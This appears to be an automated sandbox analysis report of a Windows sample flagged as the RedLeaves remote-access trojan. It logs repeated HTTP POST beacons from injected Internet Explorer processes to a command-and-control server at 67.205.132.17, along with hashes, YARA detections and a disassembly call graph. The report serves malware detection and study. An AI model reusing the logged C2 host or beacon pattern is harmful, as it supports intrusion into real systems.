    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortProcess
    16192.168.2.44976567.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:07.487189054 CET1129OUTPOST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    17192.168.2.44976667.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:07.489439964 CET1130OUTPOST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    18192.168.2.44976767.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:07.491816044 CET1131OUTPOST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    19192.168.2.44976867.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:07.497479916 CET1131OUTPOST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    2192.168.2.44973967.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:21:42.993453026 CET839OUTPOST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    20192.168.2.44976967.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:07.508974075 CET1132OUTPOST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    21192.168.2.44977267.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:32.738704920 CET1135OUTPOST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    22192.168.2.44977367.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:32.745321989 CET1136OUTPOST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    23192.168.2.44977467.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:32.748333931 CET1136OUTPOST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    24192.168.2.44977567.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:32.760200977 CET1137OUTPOST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    25192.168.2.44977667.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:32.765038967 CET1138OUTPOST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    3192.168.2.44974067.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:21:42.995886087 CET840OUTPOST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    4192.168.2.44974167.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:21:42.998060942 CET840OUTPOST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    5192.168.2.44974767.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:12.366818905 CET1112OUTPOST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    6192.168.2.44974867.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:12.369051933 CET1112OUTPOST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    7192.168.2.44974967.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:12.372329950 CET1113OUTPOST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    8192.168.2.44975067.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:12.375251055 CET1114OUTPOST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    9192.168.2.44975167.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:12.396461010 CET1114OUTPOST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:07:21:31
    Start date:10/03/2022
    Path:C:\Users\user\Desktop\cANdLlHS4N.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\cANdLlHS4N.exe"
    Imagebase:0x9a0000
    File size:3804160 bytes
    MD5 hash:B3139B26A2DABB9B6E728884D8FA8B33
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief, Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000000.235573187.0000000000CA2000.00000008.00000001.01000000.00000003.sdmp, Author: Florian Roth
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: OpCloudHopper_Malware_6, Description: Detects malware from Operation Cloud Hopper, Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000000.235322946.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief, Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000000.235102933.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Author: USG
    Reputation:low

    General

    Target ID:1
    Start time:07:21:33
    Start date:10/03/2022
    Path:C:\Users\user\AppData\Local\Temp\obedience.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\obedience.exe
    Imagebase:0x400000
    File size:1616040 bytes
    MD5 hash:6A1C14D5F16A07BEF55943134FE618C0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Yara matches:
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Author: USG
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: kev
    Antivirus matches:
    • Detection: 8%, Metadefender, Browse
    • Detection: 9%, ReversingLabs
    Reputation:low

    General

    Target ID:2
    Start time:07:21:35
    Start date:10/03/2022
    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Wow64 process (32bit):true
    Commandline:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Imagebase:0x920000
    File size:822536 bytes
    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: kev
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: kev
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: kev
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaves, Description: detect RedLeaves in memory, Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
    Reputation:high

    General

    Target ID:3
    Start time:07:21:44
    Start date:10/03/2022
    Path:C:\Users\user\AppData\Local\Temp\obedience.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Temp\obedience.exe"
    Imagebase:0x400000
    File size:1616040 bytes
    MD5 hash:6A1C14D5F16A07BEF55943134FE618C0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Yara matches:
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp, Author: USG
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: kev
    Reputation:low

    General

    Target ID:4
    Start time:07:21:46
    Start date:10/03/2022
    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Wow64 process (32bit):
    Commandline:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Imagebase:
    File size:822536 bytes
    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >

      Execution Graph

      Execution Coverage:9.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:2.1%
      Total number of Nodes:1408
      Total number of Limit Nodes:52
      execution_graph 21471 9aeaf8 21472 9aeb07 __EH_prolog3_GS 21471->21472 21513 9bcdbd 21472->21513 21474 9aeb22 21475 9aeb38 21474->21475 21529 9b8782 RaiseException __CxxThrowException@8 21474->21529 21477 9aeb3e CallNextHookEx 21475->21477 21478 9aeb51 21475->21478 21479 9aed35 21477->21479 21524 9bd77f 21478->21524 21536 aad31e 5 API calls __write_nolock 21479->21536 21484 9aed05 CallNextHookEx 21484->21479 21488 9aed28 UnhookWindowsHookEx 21484->21488 21485 9aebc8 21485->21484 21489 9aebd6 21485->21489 21499 9aec30 _memset 21485->21499 21486 9aeb87 GetClassLongA 21486->21484 21487 9aeb9b 21486->21487 21490 9aebbd 21487->21490 21491 9aeba5 GlobalGetAtomNameA 21487->21491 21488->21479 21531 9bd7c9 110 API calls ctype 21489->21531 21530 9ab7f1 CompareStringA 21490->21530 21491->21490 21492 9aec74 GetClassLongA 21496 9aecb9 GetWindowLongA 21492->21496 21497 9aec2b 21492->21497 21495 9aebe1 21532 9ac958 110 API calls ctype 21495->21532 21496->21484 21498 9aecc9 GetPropA 21496->21498 21497->21484 21498->21484 21501 9aecdc SetPropA GetPropA 21498->21501 21499->21492 21534 9ab523 114 API calls 2 library calls 21499->21534 21501->21484 21504 9aecf0 GlobalAddAtomA SetWindowLongA 21501->21504 21503 9aebed SetWindowLongA 21511 9aec13 21503->21511 21504->21484 21505 9aec66 21505->21492 21506 9aec8b GetClassNameA 21505->21506 21506->21496 21507 9aeca2 21506->21507 21535 aad9bc 86 API calls __mbscmp_l 21507->21535 21510 9aecb3 21510->21484 21510->21496 21533 9bcf01 DeactivateActCtx 21511->21533 21515 9bcdc9 __EH_prolog3 21513->21515 21516 9bce17 21515->21516 21537 9bcad3 TlsAlloc 21515->21537 21541 9bc9bb EnterCriticalSection 21515->21541 21563 9b8782 RaiseException __CxxThrowException@8 21515->21563 21556 9bc85d EnterCriticalSection 21516->21556 21521 9bce2a 21564 9bcb7a 87 API calls 4 library calls 21521->21564 21522 9bce3d std::locale::_Init 21522->21474 21525 9bcdbd ctype 103 API calls 21524->21525 21526 9bd78e 21525->21526 21527 9aeb5b 21526->21527 21579 9bc8c9 21526->21579 21527->21484 21527->21485 21527->21486 21530->21485 21531->21495 21532->21503 21533->21497 21534->21505 21535->21510 21538 9bcaff 21537->21538 21539 9bcb04 InitializeCriticalSection 21537->21539 21565 9b874a RaiseException __CxxThrowException@8 21538->21565 21539->21515 21542 9bc9de 21541->21542 21544 9bca2c GlobalHandle GlobalUnlock 21542->21544 21545 9bca17 21542->21545 21554 9bca9d _memset 21542->21554 21543 9bcab4 LeaveCriticalSection 21543->21515 21546 9b9e19 ctype 79 API calls 21544->21546 21566 9b9e19 21545->21566 21549 9bca4a GlobalReAlloc 21546->21549 21550 9bca56 21549->21550 21551 9bca7d GlobalLock 21550->21551 21552 9bca6f LeaveCriticalSection 21550->21552 21553 9bca61 GlobalHandle GlobalLock 21550->21553 21551->21554 21570 9b874a RaiseException __CxxThrowException@8 21552->21570 21553->21552 21554->21543 21557 9bc878 21556->21557 21558 9bc89f LeaveCriticalSection 21556->21558 21557->21558 21560 9bc87d TlsGetValue 21557->21560 21559 9bc8a8 21558->21559 21559->21521 21559->21522 21560->21558 21561 9bc889 21560->21561 21561->21558 21562 9bc88e LeaveCriticalSection 21561->21562 21562->21559 21564->21522 21568 9b9e2e ctype 21566->21568 21567 9b9e3b GlobalAlloc 21567->21550 21568->21567 21571 9a54f0 21568->21571 21572 9a54fd 21571->21572 21573 9a5502 21571->21573 21577 9b874a RaiseException __CxxThrowException@8 21572->21577 21578 9b91c1 79 API calls 5 library calls 21573->21578 21576 9a5508 21578->21576 21580 9bc8d5 __EH_prolog3_catch 21579->21580 21581 9bc8fe std::locale::_Init 21580->21581 21585 9c2a0c 21580->21585 21581->21526 21583 9bc8e4 21595 9c2a7e LeaveCriticalSection RaiseException ctype 21583->21595 21586 9c2a1c 21585->21586 21587 9c2a21 21585->21587 21596 9b8782 RaiseException __CxxThrowException@8 21586->21596 21589 9c2a2f 21587->21589 21597 9c29a3 InitializeCriticalSection 21587->21597 21591 9c2a6b EnterCriticalSection 21589->21591 21592 9c2a41 EnterCriticalSection 21589->21592 21591->21583 21593 9c2a4d InitializeCriticalSection 21592->21593 21594 9c2a60 LeaveCriticalSection 21592->21594 21593->21594 21594->21591 21595->21581 21597->21589 21598 9a927e 21599 9a928a __EH_prolog3 21598->21599 21623 9a5d70 21599->21623 21604 9a92d2 21630 9aff05 21604->21630 21615 9a935a 21716 9a6ccc 110 API calls ctype 21615->21716 21616 9a934f GetMenu 21616->21615 21618 9a936b 21619 9a9372 21618->21619 21620 9a9327 std::locale::_Init ctype 21618->21620 21717 9ad893 285 API calls 21619->21717 21624 9a5d7d 21623->21624 21625 9a5d87 21623->21625 21626 9a54f0 ctype 79 API calls 21624->21626 21627 9be51c 21625->21627 21626->21625 21628 9bd77f ctype 109 API calls 21627->21628 21629 9a92ad 21628->21629 21629->21604 21704 9a8ddd 21629->21704 21631 9bd77f ctype 109 API calls 21630->21631 21633 9aff12 _memset 21631->21633 21632 9a92d9 21675 9a70ad 21632->21675 21633->21632 21634 9bd77f ctype 109 API calls 21633->21634 21635 9aff4a 21634->21635 21636 9aff7b 21635->21636 21718 9afba4 119 API calls 3 library calls 21635->21718 21638 9aff9d 21636->21638 21719 9afba4 119 API calls 3 library calls 21636->21719 21640 9affc4 21638->21640 21720 9afba4 119 API calls 3 library calls 21638->21720 21641 9affea 21640->21641 21721 9afec1 121 API calls ctype 21640->21721 21644 9b0017 21641->21644 21722 9afec1 121 API calls ctype 21641->21722 21646 9b0038 21644->21646 21723 9ad421 110 API calls ctype 21644->21723 21648 9b0059 21646->21648 21724 9ad421 110 API calls ctype 21646->21724 21649 9b0076 21648->21649 21725 9ad421 110 API calls ctype 21648->21725 21652 9b008f 21649->21652 21726 9ad421 110 API calls ctype 21649->21726 21654 9b00ac 21652->21654 21727 9ad421 110 API calls ctype 21652->21727 21656 9b00c9 21654->21656 21728 9ad421 110 API calls ctype 21654->21728 21657 9b00e6 21656->21657 21729 9ad421 110 API calls ctype 21656->21729 21660 9b0103 21657->21660 21730 9ad421 110 API calls ctype 21657->21730 21663 9b0120 21660->21663 21731 9ad421 110 API calls ctype 21660->21731 21664 9b0139 21663->21664 21732 9ad421 110 API calls ctype 21663->21732 21665 9b0152 21664->21665 21733 9ad421 110 API calls ctype 21664->21733 21668 9b016f 21665->21668 21734 9ad421 110 API calls ctype 21665->21734 21670 9b018c 21668->21670 21735 9ad421 110 API calls ctype 21668->21735 21672 9b01a5 21670->21672 21736 9ad421 110 API calls ctype 21670->21736 21672->21632 21737 9ad421 110 API calls ctype 21672->21737 21676 9bd77f ctype 109 API calls 21675->21676 21677 9a70be LoadIconW 21676->21677 21678 9a70d3 _memset 21677->21678 21685 9a712a 21677->21685 21738 9a4432 21678->21738 21680 9bd77f ctype 109 API calls 21681 9a70ff 21680->21681 21743 9a6aca 114 API calls 2 library calls 21681->21743 21683 9a710f 21683->21685 21744 9afc32 151 API calls 3 library calls 21683->21744 21687 9a6c6c 21685->21687 21689 9a6c7d 21687->21689 21688 9a6c89 21693 9a950a 21688->21693 21689->21688 21690 9a6caa 21689->21690 21762 9a5590 21689->21762 21769 aac44e 76 API calls 3 library calls 21690->21769 21694 9a951e 21693->21694 21695 9a9545 21693->21695 21696 9bd77f ctype 109 API calls 21694->21696 21771 9a6000 21695->21771 21698 9a9523 LoadMenuA 21696->21698 21698->21695 21700 9a9323 21698->21700 21699 9a9553 21778 9aed99 21699->21778 21700->21615 21700->21616 21700->21620 21702 9a95a2 DestroyMenu 21702->21700 21834 9a68b1 FindResourceW 21704->21834 21706 9a8df2 21714 9a8e2e 21706->21714 21839 9a6c30 WideCharToMultiByte 21706->21839 21708 9a8e09 21840 9a5f20 21708->21840 21712 9a8e22 21847 9a5560 79 API calls ctype 21712->21847 21714->21604 21715 9be527 90 API calls ___crtsetenv 21714->21715 21715->21604 21716->21618 21717->21620 21718->21636 21719->21638 21720->21640 21721->21641 21722->21644 21723->21646 21724->21648 21725->21649 21726->21652 21727->21654 21728->21656 21729->21657 21730->21660 21731->21663 21732->21664 21733->21665 21734->21668 21735->21670 21736->21672 21737->21632 21745 9a65e6 21738->21745 21742 9a4451 21742->21680 21742->21685 21743->21683 21744->21685 21746 9a444d 21745->21746 21747 9a65f5 21745->21747 21746->21742 21749 9a1250 21746->21749 21748 9aff05 122 API calls 21747->21748 21748->21746 21757 9a11d0 21749->21757 21751 9a1270 21752 9a1274 21751->21752 21753 9a11d0 VirtualProtect 21751->21753 21752->21742 21754 9a1296 21753->21754 21754->21752 21755 9a11d0 VirtualProtect 21754->21755 21756 9a12b5 21755->21756 21756->21742 21758 9a11df 21757->21758 21759 9a1246 21757->21759 21758->21759 21760 9a11e6 VirtualProtect 21758->21760 21759->21751 21761 9a11fb 21760->21761 21761->21751 21763 9a54f0 ctype 79 API calls 21762->21763 21764 9a559a 21763->21764 21765 9a55d4 21764->21765 21766 9a5590 79 API calls 21764->21766 21770 aac44e 76 API calls 3 library calls 21765->21770 21766->21765 21768 9a55f0 21768->21690 21769->21688 21770->21768 21772 9a600b 21771->21772 21773 9a6019 21771->21773 21774 9a5f60 79 API calls 21772->21774 21790 9a5f60 21773->21790 21775 9a6014 21774->21775 21775->21699 21777 9a6031 21777->21699 21779 9aedbd 21778->21779 21782 9aedac 21778->21782 21780 9bd77f ctype 109 API calls 21779->21780 21781 9aedfb 21780->21781 21784 9a9598 21781->21784 21808 9aed3f 21781->21808 21782->21779 21824 9b8782 RaiseException __CxxThrowException@8 21782->21824 21784->21700 21784->21702 21788 9aee53 21825 9ac9c6 110 API calls ctype 21788->21825 21791 9a5f6e 21790->21791 21795 9a5f79 21790->21795 21804 9a5dc0 79 API calls ctype 21791->21804 21793 9a5f73 21793->21777 21794 9a54f0 79 API calls ctype 21794->21795 21795->21794 21799 9a5fef 21795->21799 21800 9a5e20 21795->21800 21805 aacda8 76 API calls 2 library calls 21795->21805 21806 aac44e 76 API calls 3 library calls 21795->21806 21799->21777 21801 9a5e30 21800->21801 21803 9a5e38 21801->21803 21807 9a5620 79 API calls 21801->21807 21803->21795 21804->21793 21805->21795 21806->21795 21807->21803 21809 9bcdbd ctype 103 API calls 21808->21809 21810 9aed55 21809->21810 21811 9aed60 21810->21811 21826 9b8782 RaiseException __CxxThrowException@8 21810->21826 21813 9aed6e GetCurrentThreadId SetWindowsHookExA 21811->21813 21814 9aed90 21811->21814 21813->21814 21815 9aed8b 21813->21815 21817 9ab5af 21814->21817 21827 9b874a RaiseException __CxxThrowException@8 21815->21827 21818 9ab5bb __initptd 21817->21818 21819 9bd77f ctype 109 API calls 21818->21819 21820 9ab5c9 ActivateActCtx 21819->21820 21821 9ab5e0 CreateWindowExA 21820->21821 21823 9ab5dc __initptd 21820->21823 21828 9ab625 21821->21828 21823->21788 21825->21784 21829 9ab63d 21828->21829 21830 9ab633 GetLastError 21828->21830 21831 9ab63f DeactivateActCtx 21829->21831 21830->21831 21832 9ab64e SetLastError 21831->21832 21833 9ab655 21831->21833 21832->21833 21833->21823 21835 9a68d2 21834->21835 21836 9a68d0 21834->21836 21848 9a683b LoadResource LockResource SizeofResource 21835->21848 21836->21706 21838 9a68de 21838->21706 21839->21708 21841 9a5f2d 21840->21841 21842 9a5f37 21840->21842 21843 9a54f0 ctype 79 API calls 21841->21843 21844 9a5f52 21842->21844 21845 9a5e20 79 API calls 21842->21845 21843->21842 21846 9a6c4c WideCharToMultiByte 21844->21846 21845->21844 21846->21712 21847->21714 21848->21838 21849 9ad67f 21850 9ad692 21849->21850 21856 9ad68d 21849->21856 21857 9ac937 21850->21857 21853 9ad6b7 DefWindowProcA 21853->21856 21854 9ad6a5 21860 9ad57a 21854->21860 21874 9ac897 21857->21874 21859 9ac943 21859->21853 21859->21854 21861 9ad586 __EH_prolog3_catch_GS 21860->21861 21862 9bcdbd ctype 103 API calls 21861->21862 21863 9ad59b 21862->21863 21864 9ad5b2 21863->21864 22000 9b8782 RaiseException __CxxThrowException@8 21863->22000 21866 9ad615 21864->21866 22001 9ab92c GetWindowRect GetWindowLongA 21864->22001 21986 9aa7a6 21866->21986 21869 9ad63e 22003 aad32d 5 API calls __write_nolock 21869->22003 21875 9ac8a3 __EH_prolog3 21874->21875 21882 9bd7b2 21875->21882 21877 9ac8a8 ctype 21880 9ac8ef std::locale::_Init ctype 21877->21880 21887 9a6291 21877->21887 21880->21859 21883 9bd77f ctype 109 API calls 21882->21883 21884 9bd7b7 21883->21884 21892 9a843b 21884->21892 21890 9a6299 21887->21890 21889 9a62bb 21889->21880 21891 9c2d86 77 API calls 3 library calls 21889->21891 21890->21889 21895 aacf9b 21890->21895 21891->21880 21893 9bcdbd ctype 103 API calls 21892->21893 21894 9a8445 21893->21894 21894->21877 21896 aad018 21895->21896 21901 aacfa9 21895->21901 21955 ab6403 DecodePointer 21896->21955 21898 aad01e 21956 aadb06 76 API calls 